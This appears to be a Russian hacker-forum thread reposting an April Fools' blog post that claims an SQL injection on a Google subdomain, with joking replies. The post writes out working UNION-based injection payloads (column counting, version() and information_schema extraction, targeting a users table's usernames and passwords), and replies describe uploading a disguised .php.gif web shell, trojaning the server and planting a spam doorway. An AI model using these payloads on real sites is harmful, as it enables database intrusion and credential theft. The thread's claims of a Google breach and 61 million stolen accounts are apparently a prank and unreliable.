Новости из Блогов SQL-injection на Google.com

SQL-injection на Google.com

Привет всем) Я хочу спалить еще одну скулью, теперь в Google.com
Бродил по гуглу, вдруг кавычку захотелось вставить

Code:

http://ejabat.google.com/ejabat/thread?tid=177f9d92fa1ace6b'

Получаем:

Code:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1

Конечно, начал подбирать кол-во полей:

Code:

http://ejabat.google.com/ejabat/thread?tid=177f9d92fa1ace6b+order+by+134--+f

Code:

http://ejabat.google.com/ejabat/thread?tid=-1+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134--+g

Спасибо HackBar-у за это
Вывожу версию:

Code:

http://ejabat.google.com/ejabat/thread?tid=-1+1,2,3,4,5,6,7,8,9,10,[COLOR=DarkOrange]version()[/COLOR],12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134--+g

Это ничего, дальше еще интересней =)
Вывел имена таблиц через information_schema.
В итоге интересной оказалась таблица:
ejabat_visit_users
Не долго думая сделал:

Code:

http://ejabat.google.com/ejabat/thread?tid=-1+1,2,3,4,5,6,7,8,9,10,[COLOR=DarkOrange]count(*)[/COLOR],12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134+from+ejabat_visit_users+limit+0,1--+g

Резалт 61413264.
61 ляма юзеров
Там еще оказались важные column-ы username,password. Только хотел вывести 1-го юзеря... скулью прикрыли. Я был жестоко огорчен!
Видимо гугл хорошо работает =)
СпасибО! Читайте мой блог

Оригинал http://dbitems.ru/blog/?x=entry:entry120401-054849

 

и тебя с 1 апреля

 

с 1 апреля

 

Жалко что скоро прикрыли, а так может и залиться смог, а там смотри и рут как на mysql'e. Статья хорошая, однозначно +. Теперь будет повод еще скули искать.

 

ненавижу первое апреля. То ли прикол, то ли нет... Скрины не делал?

 

Думаешь в голову в такой момент придут мысли о скринах?) Мне не пришло(

 

Нашел эту скулю еще неделю назад. До фикса успел слить 10кк юзеров.

 

Я ж говорю прикрыли, не актуально(((

M_script,
точно 10 лям слил? В личку учетку админа скинь..

 

Зелёный плюсик

Посоны, куда болталка делась, как же я без неё
Точнее, писать то в ней можно, но на главной её нету)

UPD: а, 1 апреля же.

 

adminassword
никак не могу админку найти

 

Админка: google.com/admin_here/

 

опа!! сенкс!!!
в админке только через загрузку картинок получилось залиться.. php фильтр не пропустил, а вот .php.gif нормально залилось! благо на серваке php.gif обрабатывается как .php ! =)) замаскировал, протачился, прописал хтацесс должным образом))
делюсь шеллом)))

http://goo[anti]gle[google].com/img/icons/wso.gif

 

Блин, уже удалили. Оперативно работают =( Перезалей плиз, рутнуть хочу.

 

не могу, админку перенесли куда-то..

PS полночь, кто бы мне мог в дверь звонить?! хм...

 

Блин, ну как же так. Опять заново искать админку...
PS отпишись, ты живой?
PPS у меня у одного ощущение что болталка переехала сюда?

 

все работает... че пугаешь меня? ты адрес шелла указывал с квадратными скобочками чтоли? из урла удали [anti] , [google] и все будет норм))))

 

Да, он живой, не переживайте за него! А Вы далеко от него живете?

 

А блин! А я то думал что у гугла домен странный то какой то

Готово!


PS Кого продвинуть в ТОП1 ?))

 

вери найс бро)) я протроянил серв, шелл потер) не палимся
чекни личку, я тебе трой отправил в PM, можешь в роа выложить, чтоб инфа никуда не утекла

 

Бл@ вы мой шелл удалили видимо.
Восстановите шелл, будте людьми.
Ну или хоть дор мой по виагре с морды не сносите, пожалуйста.